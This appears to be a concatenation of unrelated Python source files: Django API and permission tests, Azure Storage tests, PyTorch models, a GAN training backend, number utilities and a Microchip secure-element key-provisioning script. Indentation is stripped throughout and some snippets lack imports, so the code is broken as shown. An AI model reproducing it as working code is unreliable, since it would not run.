from canvas import util, knobs, browse
from canvas.api_decorators import json_service
from canvas.exceptions import ServiceError
from canvas.metrics import Metrics
from canvas.redis_models import RateLimit
def short_id(id):
return util.base36encode(id)
def long_id(short_id):
return util.base36decode(short_id)
def check_rate_limit(request):
return RateLimit('apicall:' + request.META['REMOTE_ADDR'], knobs.PUBLIC_API_RATE_LIMIT).allowed()
def public_api_method(f):
@csrf_exempt
@json_service
@wraps(f)
def wrapper(*args, **kwargs):
try:
request = kwargs.get('request') or args[0]
if not check_rate_limit(request):
Metrics.api_rate_limited.record(request)
raise ServiceError("Slow down there, cowboy!")
payload = request.JSON
ids = payload.get('ids')
kwargs['payload'] = payload
ret = f(*args, **kwargs)
if not ret:
return {'documentation': f.__doc__}
else:
return ret
except ServiceError as se:
raise se
return wrapper
|
11556772
|
class OperatingSystem(object,ICloneable,ISerializable):
"""
Represents information about an operating system,such as the version and platform identifier. This class cannot be inherited.
OperatingSystem(platform: PlatformID,version: Version)
"""
def Clone(self):
"""
Clone(self: OperatingSystem) -> object
Creates an System.OperatingSystem object that is identical to this instance.
Returns: An System.OperatingSystem object that is a copy of this instance.
"""
pass
def GetObjectData(self,info,context):
"""
GetObjectData(self: OperatingSystem,info: SerializationInfo,context: StreamingContext)
Populates a System.Runtime.Serialization.SerializationInfo object with the data necessary to
deserialize this instance.
info: The object to populate with serialization information.
context: The place to store and retrieve serialized data. Reserved for future use.
"""
pass
def ToString(self):
"""
ToString(self: OperatingSystem) -> str
Converts the value of this System.OperatingSystem object to its equivalent string representation.
Returns: The string representation of the values returned by the System.OperatingSystem.Platform,
System.OperatingSystem.Version,and System.OperatingSystem.ServicePack properties.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,platform,version):
""" __new__(cls: type,platform: PlatformID,version: Version) """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __str__(self,*args):
pass
Platform=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a System.PlatformID enumeration value that identifies the operating system platform.
Get: Platform(self: OperatingSystem) -> PlatformID
"""
ServicePack=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the service pack version represented by this System.OperatingSystem object.
Get: ServicePack(self: OperatingSystem) -> str
"""
Version=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a System.Version object that identifies the operating system.
Get: Version(self: OperatingSystem) -> Version
"""
VersionString=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the concatenated string representation of the platform identifier,version,and service pack that are currently installed on the operating system.
Get: VersionString(self: OperatingSystem) -> str
"""
|
11556783
|
import io
import json
import requests
import pytest
from AzureStorage import (ASClient, storage_account_list, storage_account_create_update,
storage_blob_service_properties_get, storage_blob_service_properties_set,
storage_blob_containers_create, storage_blob_containers_update, storage_blob_containers_list)
app_id = 'app_id'
subscription_id = 'subscription_id'
resource_group_name = 'resource_group_name'
@pytest.fixture()
def client(mocker):
mocker.patch('AzureStorage.MicrosoftClient.get_access_token', return_value='token')
return ASClient(app_id, subscription_id, resource_group_name, False, False)
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
def test_storage_account_list(client, mocker):
"""
Given:
- AS Client
- An API response for storage account list
When:
- Running storage_account_list
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('./test_data/storage_account_list_response.json')
mocker.patch.object(ASClient, "storage_account_list_request", return_value=api_response)
result = storage_account_list(client=client, args={})
expected_hr = '### Azure Storage Account List\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n' \
'| account_name_1 | subscription_id_1 | resource_group_name_1 | Storage | available | | location1 ' \
'|\n| account_name_2 | subscription_id_2 | resource_group_name_2 | Storage | available | available ' \
'| location_2 |\n'
assert result.outputs == api_response.get('value')
assert result.readable_output == expected_hr
def test_storage_account_single(client, mocker):
"""
Given:
- AS Client
- An API response for single storage account
When:
- Running storage_account_list with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/storage_account_single_response.json')
mocker.patch.object(ASClient, "storage_account_list_request", return_value=api_response)
result = storage_account_list(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Account List\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n| ' \
'account_name | subscription_id | resource_group_name | Storage | available | available | eastus |\n'
assert result.outputs[0] == api_response
assert result.readable_output == expected_hr
def test_storage_account_create_update(client, mocker):
"""
Given:
- AS Client
- An API response for storage account create/update
When:
- Running storage_account_create_update with the required arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/storage_account_single_response.json')
response = requests.models.Response()
response._content = json.dumps(api_response).encode('utf-8')
mocker.patch.object(ASClient, "storage_account_create_update_request", return_value=response)
result = storage_account_create_update(client=client, args={'account_name': 'account_name', "sku": "Standard_GRS",
"kind": "Storage", "location": "eastus"})
expected_hr = '### Azure Storage Account\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n' \
'| account_name | subscription_id | resource_group_name | Storage | available | available | eastus ' \
'|\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_service_properties_get(client, mocker):
"""
Given:
- AS Client
- An API response for get blob service properties
When:
- Running storage_blob_service_properties_get with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_service_properties_get_response.json')
mocker.patch.object(ASClient, "storage_blob_service_properties_get_request", return_value=api_response)
result = storage_blob_service_properties_get(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Service Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Change Feed|Delete Retention Policy|Versioning|\n'\
'|---|---|---|---|---|---|---|\n' \
'| default | account_name | subscription_id | resource_group_name | | false ' \
'| |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_service_properties_set(client, mocker):
"""
Given:
- AS Client
- An API response for set blob service properties
When:
- Running storage_blob_service_properties_set with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_service_properties_set_response.json')
mocker.patch.object(ASClient, "storage_blob_service_properties_set_request", return_value=api_response)
result = storage_blob_service_properties_set(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Service Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Change Feed|Delete Retention Policy|Versioning|\n' \
'|---|---|---|---|---|---|---|\n' \
'| default | account_name | subscription_id | resource_group_name | | | ' \
'|\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_create(client, mocker):
"""
Given:
- AS Client
- An API response for create blob container
When:
- Running storage_blob_containers_create with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_create_update_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_create_update_request", return_value=api_response)
result = storage_blob_containers_create(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|\n' \
'|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_update(client, mocker):
"""
Given:
- AS Client
- An API response for update blob container
When:
- Running storage_blob_containers_update with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_create_update_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_create_update_request", return_value=api_response)
result = storage_blob_containers_update(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Public Access|\n' \
'|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_list(client, mocker):
"""
Given:
- AS Client
- An API response for blob containers list
When:
- Running storage_blob_containers_list
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('./test_data/blob_containers_list_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_list_request", return_value=api_response)
result = storage_blob_containers_list(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Containers list\n' \
'|Container Name|Account Name|Subscription ID|Resource Group|Public ' \
'Access|Lease State|Last Modified Time|\n' \
'|---|---|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | None | Available ' \
'| 2020-02-20T20:20:20.0000000Z |\n' \
'| test2 | account_name | subscription_id | resource_groups | None | ' \
'Available | 2020-02-20T20:20:20.0000000Z |\n'
assert result.outputs == api_response.get('value')
assert result.readable_output == expected_hr
def test_storage_blob_containers_single(client, mocker):
"""
Given:
- AS Client
- An API response for single blob container
When:
- Running storage_blob_containers_list with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_single_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_list_request", return_value=api_response)
result = storage_blob_containers_list(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers list\n' \
'|Container Name|Account Name|Subscription ID|Resource Group|Public ' \
'Access|Lease State|Last Modified Time|\n' \
'|---|---|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | None | Available ' \
'| 2020-02-20T20:20:20.0000000Z |\n'
assert result.outputs[0] == api_response
assert result.readable_output == expected_hr
|
11556784
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
#--------------------------------------------------Base Module--------------------------------------------------#
class DepthwiseSeparableConv(nn.Module):
def __init__(self, input_dim, out_dim, kernel_size, conv_dim=1, padding=0, bias=True, activation=False,dilation=1):
super().__init__()
self.activation = activation
if conv_dim == 1:
self.conv = nn.Conv1d(in_channels=input_dim, out_channels=out_dim, kernel_size=kernel_size,
padding=padding, bias=bias,dilation=dilation)
if activation:
nn.init.kaiming_normal_(self.conv.weight,nonlinearity='relu')
else:
nn.init.xavier_normal_(self.conv.weight)
def forward(self, input):
input = input.transpose(1, 2)
out = self.conv(input)
out = out.transpose(1, 2)
if self.activation:
return F.relu(out)
else:
return out
class Highway(nn.Module):
def __init__(self, layer_num, dim):
super().__init__()
self.layer_num = layer_num
self.linear = nn.ModuleList([nn.Linear(dim, dim) for _ in range(layer_num)])
self.gate = nn.ModuleList([nn.Linear(dim, dim) for _ in range(layer_num)])
def forward(self, x):
for i in range(self.layer_num):
gate = F.sigmoid(self.gate[i](x))
nonlinear = F.relu(self.linear[i](x))
x = gate * nonlinear + (1 - gate) * x
return x
def GLU(input):
out_dim=input.shape[2]//2
a,b=torch.split(input,out_dim,dim=2)
return a*F.sigmoid(b)
class DimReduce(nn.Module):
def __init__(self, input_dim, out_dim,kernel_size):
super().__init__()
self.convout = nn.Conv1d(input_dim, out_dim*2, kernel_size, padding=kernel_size // 2)
nn.init.xavier_normal_(self.convout.weight)
def forward(self, input):
input = input.transpose(1, 2)
input = self.convout(input)
input = input.transpose(1, 2)
out=GLU(input)
return out
class Embedding(nn.Module):
def __init__(self, char_dim, word_dim, word_len, out_dim, kernel_size, dropout=0.1):
super().__init__()
self.conv1d = DepthwiseSeparableConv(char_dim, char_dim, kernel_size, padding=kernel_size // 2,activation=True)
self.highway = Highway(2, char_dim + word_dim)
self.dropout = dropout
self.char_dim = char_dim
self.word_len = word_len
def forward(self, word_emb, char_emb):
batch_size = word_emb.shape[0]
seq_len = word_emb.shape[1]
char_emb = char_emb.view([-1, self.word_len, self.char_dim])
char_emb = self.conv1d(char_emb)
char_emb, _ = torch.max(char_emb, dim=1)
char_emb = char_emb.view(batch_size, seq_len, self.char_dim)
emb = torch.cat([word_emb, char_emb], dim=2)
emb = self.highway(emb)
return emb
class Similarity(nn.Module):
def __init__(self, input_dim, dropout=0.1):
super().__init__()
self.dropout = dropout
self.ff1=nn.Linear(10,10)
self.ff2=nn.Linear(10,1)
def forward(self, article, template,article_mask,template_mask):
article_len = article.shape[1]
template_len = template.shape[1]
c=article.unsqueeze(dim=2)
c=c.repeat([1,1,template_len,1])
q=template.unsqueeze(dim=1)
q=q.repeat([1,article_len,1,1])
S=q-c
S=torch.sum(S*S,dim=3)
S=torch.exp(-1*S)
article_mask=article_mask.unsqueeze(dim=2)
article_mask=article_mask.repeat([1,1,template_len])
template_mask=template_mask.unsqueeze(dim=1)
template_mask=template_mask.repeat([1,article_len,1])
S=S*article_mask*template_mask
row_max,_=torch.max(S,dim=2)
row_max,_=row_max.topk(10,dim=1,largest=True)
row_max=F.relu(self.ff1(row_max))
row_max=self.ff2(row_max)
out=row_max
out=out.squeeze()
return out
#--------------------------------------------------GLDR Module--------------------------------------------------#
class ResidualBlock(nn.Module):
def __init__(self, input_dim,kernel_size,dilation):
super().__init__()
self.conv1=DepthwiseSeparableConv(input_dim,input_dim*2,kernel_size,padding=kernel_size//2*dilation,dilation=dilation)
def forward(self, input):
out=self.conv1(input)
out=GLU(out)
out=input+out
return out
class ConvEncoder(nn.Module):
def __init__(self,input_dim,kernel_size,conv_num,exp_num=5,refine_num=3,dropout=0.1):
super().__init__()
self.dropout=dropout
self.exp_conv=nn.Sequential()
dilation=1
for i in range(conv_num):
self.exp_conv.add_module(str(i),ResidualBlock(input_dim,kernel_size,dilation))
if i<exp_num:
dilation*=2
self.refine=nn.Sequential()
for i in range(refine_num):
self.refine.add_module(str(i),ResidualBlock(input_dim,kernel_size,dilation=1))
def forward(self, input):
out=self.exp_conv(input)
out=self.refine(out)
out=F.dropout(out,p=self.dropout,training=self.training)
return out
class FastRerank(nn.Module):
def __init__(self, char_dim, char_vocab_size, word_len, word_dim, word_mat, emb_dim, kernel_size,
encoder_block_num,model_block_num, dropout=0.1):
super().__init__()
self.word_emb = nn.Embedding(word_mat.shape[0],word_dim)
self.conv_encoder=ConvEncoder(word_dim,kernel_size,conv_num=encoder_block_num,dropout=dropout)
self.similarity = Similarity(word_dim, dropout)
def forward(self, article_word, article_char, template_word, template_char,article_mask,template_mask):
article_word = self.word_emb(article_word)
template_word = self.word_emb(template_word)
article=article_word
template=template_word
article = self.conv_encoder(article)
template = self.conv_encoder(template)
score = self.similarity(article, template,article_mask,template_mask)
return score
|
11556795
|
from test_project.settings import MIDDLEWARE
from django.contrib.auth.models import Group, User
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from test_project.testapp.models import UserAccount
class ViewsTestCase(APITestCase):
def setUp(self):
UserAccount.objects.all().delete()
User.objects.all().delete()
Group.objects.all().delete()
def test_admin_can_do_anything_with_logs(self):
admin_group = Group.objects.create(name="admin")
admin_user = User.objects.create()
admin_user.groups.add(admin_group)
self.client.force_authenticate(user=admin_user)
url = reverse("get-logs")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
url = reverse("delete-logs")
response = self.client.delete(url, format="json")
self.assertEqual(response.status_code, 200)
def test_dev_can_only_get_logs(self):
dev_group = Group.objects.create(name="dev")
dev_user = User.objects.create()
dev_user.groups.add(dev_group)
self.client.force_authenticate(user=dev_user)
url = reverse("get-logs")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
url = reverse("delete-logs")
response = self.client.delete(url, format="json")
self.assertEqual(response.status_code, 403)
def test_anonymous_user_can_view_landing_page(self):
url = reverse("get-landing-page")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
def test_authenticated_user_can_view_landing_page(self):
user = User.objects.create()
self.client.force_authenticate(user=user)
url = reverse("get-landing-page")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
|
11556809
|
import pytest
from django.urls import reverse
from articles.views import ArticleListView
from tests.factories import ArticleFactory
@pytest.mark.django_db
class TestVirtualFields(object):
def _request(self, admin_client):
response = admin_client.get(reverse('articles:list'))
assert response.status_code == 200
return response
def _assert_list_items_len(self, response, length):
assert 'list_items' in response.context_data
assert len(response.context_data['list_items']) == length
def test_virtual_field(self, admin_client):
"""
Virtual field displayed in ListView
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'category']
response = self._request(admin_client)
self._assert_list_items_len(response, 1)
item = response.context_data['list_items'][0]
assert item['fields'][0]['value'] == article.title
assert item['fields'][1]['value'] == article.description
assert item['fields'][3]['value'] == article.category.name
def test_missing_virtual_field(self, admin_client):
"""
Error happens on wrong virtual field name
"""
article = ArticleFactory() # noqa
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'virtual_field']
response = self._request(admin_client)
search_virtual_field = False
for field in response.context_data['list_items'][0]['fields']:
if field['type'] == 'field' and 'virtual_field' in field['field']:
search_virtual_field = True
assert search_virtual_field is False
def test_missing_virtual_field_error(self, admin_client):
"""
Error happens on wrong virtual field name
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'virtual_field']
exc = pytest.raises(
AttributeError, view.get_field_value, 'virtual_field', article)
assert str(exc.value) == \
"'Article' object has no attribute 'virtual_field'", \
exc.value.message
def test_missing_virtual_field_execution_attribute_error(self,
admin_client):
"""
Error happens on wrong virtual field name
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'broken']
view.get_broken_field = lambda obj: obj.unknown_field
exc = pytest.raises(
AttributeError, view.get_field_value, 'broken', article)
assert str(exc.value) == \
"'Article' object has no attribute 'unknown_field'", \
exc.value.message
|
11556842
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.model.Seq2Seq import dns,ept,groupatt,lstm,mathen,rnnencdec,saligned,transformer,rnnvae
from mwptoolkit.model.Seq2Seq.dns import DNS
from mwptoolkit.model.Seq2Seq.ept import EPT
from mwptoolkit.model.Seq2Seq.groupatt import GroupATT
from mwptoolkit.model.Seq2Seq.lstm import LSTM
from mwptoolkit.model.Seq2Seq.mathen import MathEN
from mwptoolkit.model.Seq2Seq.rnnencdec import RNNEncDec
from mwptoolkit.model.Seq2Seq.rnnvae import RNNVAE
from mwptoolkit.model.Seq2Seq.saligned import Saligned
from mwptoolkit.model.Seq2Seq.transformer import Transformer
|
11556845
|
from .backend import Backend
import torch.multiprocessing as mp
from hypergan.gan_component import ValidationException, GANComponent
import torch.utils.data as data
import hyperchamber as hc
import hypergan as hg
import copy
import torch
import time
def create_input(input_config):
klass = GANComponent.lookup_function(None, input_config['class'])
return klass(input_config)
def train(device, gan, save_file, inputs, done_event):
gan.inputs = inputs
from hypergan.trainable_gan import TrainableGAN
trainable_gan = TrainableGAN(gan, backend_name = "single-gpu", save_file = save_file)
#torch.manual_seed(device)
done_event.set()
while(True):
trainable_gan.step()
class HogwildBackend(Backend):
"""https://towardsdatascience.com/this-is-hogwild-7cc80cd9b944"""
def __init__(self, trainable_gan, devices):
self.trainable_gan = trainable_gan
self.processes = []
done_events = []
mp.set_start_method('spawn', force=True)
for component in trainable_gan.gan.generator_components() + trainable_gan.gan.discriminator_components():
component.share_memory()
if devices == "-1":
print("Running on all available devices: ", torch.cuda.device_count())
devices = list(range(torch.cuda.device_count()))
else:
devices = [int(d) for d in devices.split(",")]
print("Devices:", devices)
#gan.inputs = inputs
num_processes=4
for device in range(num_processes):
done_event = mp.Event()
inputs = self.trainable_gan.gan.inputs.to(self.trainable_gan.gan.device)
p = mp.Process(target=train, args=(device, trainable_gan.gan, trainable_gan.save_file, inputs, done_event))
p.start()
self.processes.append(p)
done_event.wait()
def save(self):
self.trainable_gan.save_locally()
def step(self):
time.sleep(0.1)
|
11556903
|
import math
import re
from decimal import Decimal
class NumUtil(object):
"""
- number util
"""
UK = 100000000 # 억
@staticmethod
def int2digit(n, base=10): # base: 진수
res = ''
while n > 0:
n, r = divmod(n, base)
res = str(r) + res
return res
@staticmethod
def comma_str(n, precision=0):
"""
:param n: 수치 (문자열 또는 수치형)
:param precision: 소수점 자리수
"""
try:
if n is None:
return None
if precision > 0:
n = float(n)
else:
n = int(float(n))
if isinstance(n, int):
return r'{:,d}'.format(n)
elif isinstance(n, float):
rule = r'{:,.%df}' % precision
return rule.format(n)
else:
return n
except Exception: # @UnusedVariable
return n
@staticmethod
def auto_convert(num):
try:
return int(num)
except:
try:
return float(num)
except:
try:
return str(num)
except:
return num
@staticmethod
def to_digit(num):
try:
_num = ''
for a in str(num):
if ('0' <= a <= '9') or a in '-.':
_num += a
_num = _num.lstrip('0')
return int(_num)
except:
return 0
@staticmethod
def has_digit(num):
for a in str(num):
if a.isdigit():
return True
return False
@staticmethod
def remove_comma(line):
return re.sub(r'''(\d),(\d{1})''', r'''\1\2''', line)
@staticmethod
def to_readable(n, min_decimal=0.001, max_decimal=1000):
try:
if (0 < math.fabs(n) < min_decimal) or (max_decimal < math.fabs(n)):
return "{:.0e}".format(Decimal(n)).replace('+', '') # scientific notation
else:
return n # decimal notation
except:
return n
@staticmethod
def is_float(string):
try:
float(string)
return True
except ValueError:
return False
@staticmethod
def is_int(string):
try:
int(string)
return True
except ValueError:
return False
@staticmethod
def base_num(v: float):
try:
v_str = str(float(v))
if v_str.endswith('.0'):
v_str = v_str.replace('.0', '')
if v_str.count('.') > 0:
v_str = v_str.split('.')[1]
return 10 ** (-len(v_str))
else:
return 10 ** (v_str.count('0'))
# if v_str.endswith('.0'):
# v_str = v_str.replace('.0', '')
# # print()
# # print(v_str)
# try:
# a, b = v_str.split('.')
# # print('a:', a, 'b:', b)
# return 10 ** (-len(b))
# except:
# return 10 ** (len(v_str)-1)
except:
return None
if __name__ == '__main__':
print(NumUtil.base_num(3.5))
print(NumUtil.base_num(4))
print(NumUtil.base_num(0.001))
print(NumUtil.base_num(0.018))
print(NumUtil.base_num(0.00100))
print(NumUtil.base_num(2120.00))
print(NumUtil.base_num(700))
# print(NumUtil.to_digit('-7,097,985.0원'))
# print(NumUtil.has_digit('-a22a'))
# print(type(NumUtil.auto_convert('20160101')))
# print(type(NumUtil.auto_convert('2016-01-01')))
# print(type(NumUtil.auto_convert('+1')))
# print(type(NumUtil.auto_convert('-1')))
# print(type(NumUtil.auto_convert('-1.1')))
# print(NumUtil.to_digit('0001020'))
# print(NumUtil.to_digit('0000000'))
# print(NumUtil.int2digit(8)
# print(NumUtil.int2digit(8, 2)
# print(NumUtil.int2digit(8, 16)
# print(NumUtil.comma_str(-100000)
# print(NumUtil.remove_comma('123,456,789'))
# print(NumUtil.remove_comma('브렉시트 충격서 벗어나는 코스피…나흘째 올라 1,970선 회복'))
# print(NumUtil.remove_comma('가,나,다 123,456,789.00'))
# print(NumUtil.remove_comma('23,456,789.00억원'))
# print(NumUtil.to_readable(0.001))
# print(NumUtil.to_readable(0.0001))
# print(NumUtil.to_readable(1000))
# print(NumUtil.to_readable(10000))
# print(NumUtil.to_readable('title'))
# print(NumUtil.comma_str(123456789012345.1234))
# print(NumUtil.comma_str(123456789012345.1234, 2))
# print(NumUtil.comma_str(123456789012345, 1))
# print(NumUtil.comma_str('123456789012345.1234'))
# print(NumUtil.comma_str('123456789012345.1234', 2))
# print(NumUtil.comma_str('123456789012345', 1))
pass
|
11556918
|
import torch
import torch.nn as nn
from torch.autograd import Variable
class DescriptionEncoder(nn.Module):
"""
This class is for the Description Encoder
which is a stacked LSTM. It can be used to
encode a given input, a description of an entity,
and outputs the embedding for that entity.
"""
def __init__(self, embed_size, hidden_size, seq_len, num_layers):
"""
Initialize the model
Arguments
---------
embed_size : Size of the pre-trained embeddings
hidden_size : Size of the hidden layers
seq_len : Length of input sequence
num_layers : Number of layers in the LSTM
"""
super(DescriptionEncoder, self).__init__()
self.embed_size = embed_size
self.hidden_size = hidden_size
self.seq_len = seq_len
self.num_layers = num_layers
self.inp = nn.Linear(embed_size, hidden_size)
self.lstm = nn.LSTM(hidden_size, hidden_size // 2, 1,
batch_first=True)
self.rnn = nn.RNN(hidden_size // 2, hidden_size,
num_layers, batch_first=True)
self.out = nn.Linear(hidden_size, embed_size)
def forward(self, inp_desc, hidden=None):
if hidden is None:
hidden = self.init_hidden()
inp_desc = self.inp(inp_desc)
output, hidden = self.rnn(self.lstm(inp_desc)[0])
output = self.out(output)
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.num_layers,
self.seq_len,
self.hidden_size))
|
11556932
|
import pytest
from pytest_cases import fixture
class TestMethod:
@pytest.fixture
def pytest_fxt(self):
return "Hello"
def test_with_pytest(self, pytest_fxt):
# succeeds
assert pytest_fxt == "Hello"
@fixture
def cases_fxt(self):
return "Hello"
def test_with_cases(self, cases_fxt):
# raises an error with regards to 'self'
assert cases_fxt == "Hello"
def test_synthesis(module_results_dct):
assert list(module_results_dct) == [
'test_with_pytest',
'test_with_cases'
]
|
11556965
|
import base64
import binascii
import os
import os.path
import cryptography
from cryptography import x509
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec, utils
from cryptoauthlib import *
from mchpcert_bckp_restore import isMCHP_cert, mchp_cert_bckp
from public_key_rotation_helper import *
from certs_handler import *
from trustplatform import *
# Setup cryptography
crypto_be = cryptography.hazmat.backends.default_backend()
tflexSlotType = {
0: "private", 1: "private", 2: "private", 3: "private",
4: "private", 5: "secret", 6: "secret", 7: "sboot_dig",
8: "reserved", 9: "secret", 10: "cert", 11: "cert",
12: "cert", 13: "public", 14: "public", 15: "public"
}
slotsize = {
0: 32, 1: 32, 2: 32, 3: 32,
4: 32, 5: 32, 6: 32, 7: 32,
8: 416, 9: 64, 10: 64, 11: 64,
12: 64, 13: 64, 14: 64, 15: 64
}
# General Cryptoauthlib Macros
LOCK_ZONE_CONFIG = 0x00
LOCK_ZONE_DATA = 0x01
LOCK_ZONE_NO_CRC = 0x80
LOCK_ZONE_CONFIG = 0x00
ATCA_ZONE_CONFIG = 0x00
ATCA_ZONE_DATA = 0x02
resource_dir = "../resources/"
def create_resources_for_c_examples():
application_bin = 'secureboot_test_app.bin'
application_h = 'secureboot_test_app.h'
app_signature_bin = 'secureboot_test_app_sign.bin'
app_signature_h = 'secureboot_test_app_sign.h'
with open(application_bin, 'rb') as f:
app_image = f.read()
with open(application_h, 'w') as f:
f.write('uint8_t secureboot_test_app[] = {\n')
f.write(str(common_helper.convert_to_hex_bytes(app_image)))
f.write('};')
BLOCKSIZE = 65536
# Hashing the Application binary file bin_file
chosen_hash = hashes.SHA256()
hasher = hashes.Hash(chosen_hash, crypto_be)
app_file = open(application_bin, "rb")
buf = app_file.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = app_file.read(BLOCKSIZE)
app_file.close()
digest = hasher.finalize()
key_file = 'slot_15_ecc_key_pair.pem'
with open(key_file, 'rb') as f:
# Loading the private key from key_file
private_key = serialization.load_pem_private_key(
data=f.read(),
password=<PASSWORD>,
backend=crypto_be)
# Signing the digest of the Application binary file bin_file
sign = private_key.sign(
digest,
ec.ECDSA(utils.Prehashed(chosen_hash))
)
# Extract actual Signature bytes
r_offset = (sign[3]-32)+4
sign_r = sign[r_offset:r_offset+32]
s_offset = (sign[r_offset+32+1]-32)+(r_offset+32+2)
sign_s = sign[s_offset:s_offset+32]
with open(app_signature_bin, 'wb') as f:
f.write(sign_r)
f.write(sign_s)
with open(app_signature_h, 'w') as f:
f.write('uint8_t secureboot_test_app_sign[] = {\n')
f.write(str(common_helper.convert_to_hex_bytes(sign_r) + common_helper.convert_to_hex_bytes(sign_s)))
f.write('};')
def create_resource_and_program(slot_number):
"""
Creates resource for a slot according to its type then programs it
"""
# Get slot type from dict
slot_type = tflexSlotType[slot_number]
# Get slot size from dict
slot_size = int(slotsize[slot_number])
# Configure and create data according to slot type
if (slot_type == "private"):
print("Slot", slot_number, "is a private key slot, no action required")
#print("Tflex devices ship with generated private keys in respective slots")
elif (slot_type == "secret") or (slot_type == "general"):
# Generate data
new_key_bytes = bytearray(slot_size)
new_key_bytes = os.urandom(slot_size)
# Generate the .pem file
if (slot_type == "secret"):
addstr = "_secret_key"
elif (slot_type == "general"):
addstr = "_general_data"
key_file_name = "slot_" + str(slot_number) + addstr + ".pem"
if (slot_number != 5):
assert atcab_write_bytes_zone(ATCA_ZONE_DATA, slot_number, 0, new_key_bytes, slot_size) == Status.ATCA_SUCCESS
elif (slot_number == 5):
with open("slot_6_secret_key.pem", 'rb') as f:
pem_bytes = f.read()
type_name, headers, io_key = pem.unarmor(pem_bytes)
#print(binascii.hexlify(io_key[17: len(io_key)]))
io_key = io_key[17: len(io_key)]
assert atcab_write_enc(slot_number, 0, new_key_bytes, io_key, 6) == Status.ATCA_SUCCESS
print('\nNOTE: While writing symmetric key into secure element it has to be encrypted with IO protection key. So here, Slot 6 (IO protection key) is written before slot 5 (Symmetric key) \n')
with open(key_file_name.replace('.pem', '.h'), 'w') as f:
f.write('uint8_t '+ 'slot_' + str(slot_number) + addstr + '[] = {\n')
key_for_c = common_helper.convert_to_hex_bytes(new_key_bytes)
f.write(str(key_for_c))
f.write('};')
f.close()
with open(key_file_name, 'w') as f:
f.write(common_helper.convert_symmetric_to_pem(new_key_bytes, slot_size))
f.close()
print("Slot", slot_number, "is a "+tflexSlotType[slot_number]+' key, created ' + key_file_name+' and programmed')
elif (slot_type == "reserved"):
print("Slot", slot_number, "is a general purpose slot of size 416 bytes, no action required")
elif (slot_type == "sboot_dig"):
print("Slot", slot_number, "is a secureboot digest slot, slot can only be written through secureboot command")
